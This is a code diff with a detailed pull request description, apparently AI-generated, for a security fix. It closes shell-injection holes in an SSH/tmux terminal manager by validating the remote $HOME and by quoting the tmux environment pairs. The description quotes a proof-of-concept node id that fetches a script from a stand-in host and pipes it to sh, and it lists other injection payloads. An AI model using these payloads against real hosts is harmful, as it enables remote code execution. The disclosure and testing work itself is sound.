+++ b/src/main/remote-ssh/ssh-project.ts
@@ -8,6 +8,7 @@ import { parseLsDirs, posixQuote, quoteRemotePath, remoteTmuxConf, sshHostKey, t
 import type { DownloadResult, SshPassphraseRequest, SshProjectStatusEvent } from '../../shared/types'
 import { candidateName, safeDownloadBasename } from '../../core/download-name'
 import { findExecutableSync, shellPathNow } from '../../core/exec-path'
+import { isSafeRemoteHome } from '../../core/remote-safety'
 import { mediaCachePruneList, remoteMediaCacheName } from '../../core/remote-ssh/media-cache'
 import { allowMediaPath } from '../media-protocol'
 import { remoteAccountConfigDir, isSupportedClaudeVersion } from '../../core/claude-accounts-core'
@@ -533,8 +534,13 @@ export class SshProjectManager {
         // unresolved home just disables the remote context meter / subagent transcript / search.
         let remoteHome: string | undefined
         try {
+          // Validated, not merely non-empty: this string is interpolated into remote command
+          // lines (the tmux.conf write below) and into the tmux `-e CLAUDE_CONFIG_DIR=…` pair the
+          // PTY manager builds, so a host answer carrying a newline would be a command separator.
+          // Same fail-open direction as the catch — an unusable answer just disables the features
+          // that need an absolute remote home. See `isSafeRemoteHome`.
           const r = await this.r.run(childArgs(conn, controlPath, 'printf %s "$HOME"'))
-          if (r.code === 0 && r.stdout.trim()) remoteHome = r.stdout.trim()
+          if (r.code === 0 && isSafeRemoteHome(r.stdout.trim())) remoteHome = r.stdout.trim()
         } catch {
           // fail-open
         }
@@ -719,7 +725,7 @@ export class SshProjectManager {
       let home = c.remoteHome
       if (!home) {
         const r = await this.r.run(childArgs(c.conn, c.controlPath, 'printf %s "$HOME"'))
-        if (r.code === 0 && r.stdout.trim()) home = r.stdout.trim()
+        if (r.code === 0 && isSafeRemoteHome(r.stdout.trim())) home = r.stdout.trim()
       }
       if (!home) return null
       const token = `${Date.now().toString(36)}${(this.uploadSeq++).toString(36)}`


### PR DESCRIPTION
> **SECURITY FIX — the vulnerability is present in shipped `main` today.** It was not introduced by any in-flight branch, and this PR is deliberately independent of the identity series so it can ship on its own.
>
> **Review history:** the first version of this PR was **defective** — it quoted correctly and then destroyed the quoting on the way out (see "The second bug" below). An adversarial review proved RCE still landed through it. That is fixed, and the tests that should have caught it are here.

## The original vulnerability

`remoteTmuxPtyArgs` (`src/core/remote-ssh/control-master.ts`) builds **one shell line** that `ssh -t` hands to the remote user's login shell. Every token in it was `posixQuote`d — the session name, the cwd, the program, its args, the `-f` conf path — **except** the tmux `-e KEY=VALUE` pairs.

Those pairs carry the **raw** React Flow node id (`NODETERM_NODE_ID=<id>`) and the managed-account `CLAUDE_CONFIG_DIR`. A node id lives in `.nodeterm/project.json`: a file that travels in a **cloned or shared repo** and is written on remote hosts.

```
tmux -L nodeterm-rmt new-session -A -e NODETERM_HOOK_ENDPOINT=/ep \
  -e NODETERM_NODE_ID=n1;curl${IFS}http://evil/x|sh;# -e ... -s 'nt-n1' -c '/home/u'
```

The `;` terminates the tmux command; `curl … | sh` then runs **as the SSH user**, the moment the victim opens that node in an SSH project.

**The local path was already safe** and is unchanged: local tmux is spawned with an argv array, and `sessionName()` sanitises to `[A-Za-z0-9_-]`.

## The second bug — quoting was necessary but not sufficient

The first fix `posixQuote`d the pairs and then spliced them in with:

```ts
cmd.replace('new-session -A ', `new-session -A ${quoted} `)
```

In a **string** replacement argument, `` $` ``, `$&`, `$$` and `$'` are expansion patterns. `$'` inserts *the text following the match* — `-s '<session>' -c '<cwd>' '<program>' '<args>'` — **inside** the single-quoted token being built. That inverts the quote parity of that copy and un-quotes everything `remoteTmuxCommand` had carefully quoted. The escape does not even need to be in the node id.

Four vectors, each with a node id that **passes** `isSafeNodeId`, each proven to execute a canary through a real `/bin/sh`:

| | escape rides | weaponised by |
|---|---|---|
| A | `node.data.agentId` = `` claude$' `` | `node.data.cwd` = `/srv/app;id;#` |
| B | remote `$HOME` = `` /home/u$'x `` | same cwd |
| C | `CLAUDE_CONFIG_DIR` from that `$HOME` | same cwd |
| D | `` claude$' `` | `programArgs` `--resume sess;id;#` |

A and D come entirely from one `.nodeterm/project.json`. **Fix:** the replacement is now a **function**, which is never pattern-expanded.

Note B: `isSafeRemoteHome` accepts `` /home/u$'x `` and **should** — it is a legal path. The validator was never the defence for this class; the splice is.

## The fix — three layers

### 1. Splice correctly, and quote at the boundary

* `remoteTmuxPtyArgs` — function replacement, and every `extraEnv` token `posixQuote`d.
* **`remote-hooks.ts`: five unquoted `$HOME`-derived splices in `setup()`**, not the two originally reported — also the endpoint write, the config read, and `mkdir -p $(dirname …)`.
* **The opencode instructions target (2 sites).** `remoteHome` was interpolated raw *inside double quotes* — `"${XDG_CONFIG_HOME:-<home>/.config}/…"` — where `$` and backticks are still live, so a `$HOME` of `/home/u$(id)` executed on the host. It cannot become a quoted literal (the **host** owns `$XDG_CONFIG_HOME`), so the untrusted half is bound to a shell **variable** first: a parameter expansion's result is not re-expanded. Verified against real `/bin/sh` with the variable set, unset, and holding a space — `ARGC=1` in all three, payload never runs.
* **The fourth `$(dirname …)`, in `ensureFullscreenTuiAt`** — missed when the other three were quoted. Also a live functional bug: on `/Users/Enes Kirca` the substitution word-splits (measured `ARGC=2`), `mkdir` creates junk dirs, the quoted `cat >` then fails and the `catch` swallows it — so fullscreen-TUI was **silently never written for any macOS user with a space in their home**.
* The managed-account `CLAUDE_CONFIG_DIR` pair, which reaches the same splice from `accountId` + remote `$HOME`.

Checked and confirmed **already safe** (no change): every remote `tmux -t <target>` builder (all callers pass `sessionName(...)`), `remote-git.ts`, `remote-file.ts`, `ssh-fs.ts` incl. the quick-open chain, `sshWriteArgs`, upload/download, and the codex/grok/account/skill installers.

### 2. Validate at the choke point

`PtyManager.create` is the single place every session spawn passes through, and `pty:create` validated `persistKey` **not at all**. New `src/core/remote-safety.ts` (in `src/core`, so the Electron and Server-Edition shells both get it): `isSafeNodeId` and `isSafeRemoteHome`, the latter applied at all three host-`$HOME` read sites. `isSafeRemoteGrokHome` now delegates to it, so there is one rule instead of two.

## Failure direction, and why

**`persistKey`: refuse the spawn** (throw a readable error), do not sanitise.

* *It cannot brick a canvas.* Node ids come from exactly one producer, `nextId()` in `src/renderer/state/workspace.ts` — a shape stable since the initial commit — and no `uuid()` mints one. Canvas-control, kanban and the relay only ever reference ids that already exist. It is also the charset the codex identity shim **already** enforces on `$NODETERM_NODE_ID`, so this moves an existing rule to the boundary.
* *Sanitising would be worse than it looks.* `NODETERM_NODE_ID` is a cross-boundary contract — `Canvas.tsx` keys `agentStatus.byId` off the **raw** id. A silently rewritten id would report status for a node that does not exist: a terminal that looks healthy and is permanently dark. The throw surfaces as a visible spawn error (`TerminalNode.tsx:4372`), not a black pane.
* An **empty** `persistKey` still means "not persistent" and spawns normally.

**The remote `$HOME`: fail open** (return `null` / leave `remoteHome` undefined), matching what that code already does at every other step.

## Tests

TDD, red first. Every layer mutation-checked.

* **`control-master.realsh.test.ts` (new, 28)** — executes the built line through a **real `/bin/sh`** with a stub `tmux` that dumps argv NUL-separated and canary binaries that leave a marker if reached. 24 payloads plus the four replacement patterns, plus all four PoC vectors. A parser-only test cannot be trusted to know tricks nobody has taught it yet — this is what makes the `$'` class detectable.
* `control-master.injection.test.ts` (6) — the fast structural guard. `PAYLOAD` now carries `` $' ``, `` $` ``, `$&`, `$$`, and the values *after* the splice are hostile **on purpose**: pinning them benign is precisely what let the defect pass a green suite.
* `remote-safety.test.ts` (9) — both predicates, plus a false-positive sweep over 17 realistic homes (spaces, non-ASCII, apostrophe, literal `$`) and 11 real id shapes.
* `pty-persist-key-guard.test.ts` (11) — `create` refuses the unsafe set, spawning nothing; accepts what the app mints; still spawns for an empty key.
* `remote-hooks.test.ts` (+7) — newline `$HOME` returns null; spaced `$HOME` installs and appears unquoted in no shell line; the opencode expression is inert and one word under real `sh`; both installers route through it; the fullscreen-TUI `dirname` is quoted.
* `ssh-project.test.ts` (+3) — **the gap the review found**: both `isSafeRemoteHome` call sites here previously had *no* test, so reverting them left the suite green and the original mutation claim was wrong.
* `pty-coattach.test.ts` — one existing test adapted and strengthened (reads the tombstone map directly, then asserts the second layer).

**Mutation results** (baseline: 4 environmental failures):

| mutation | failures |
|---|---|
| function → string replacement (**the defect**) | 11 |
| drop `posixQuote` on `extraEnv` | 31 |
| drop `isSafeNodeId` guard | 10 |
| opencode target → raw interpolation | 4 |
| drop `isSafeRemoteHome` in `remote-hooks` | 2 |
| revert **both** `ssh-project` sites | 2 *(was 0)* |
| unquote the 4th `$(dirname …)` | 1 |

## Gates

* `npm run typecheck` — clean.
* `npx vitest run` — **5378 passed**, 4 failed. All 4 environmental in a symlinked clone (3 × `node-pty-patch`, 1 × `webgl-addon-pair`); verified identical on a stashed `origin/main` in the same tree.

🤖 Generated with [Claude Code](https://claude.com/claude-code)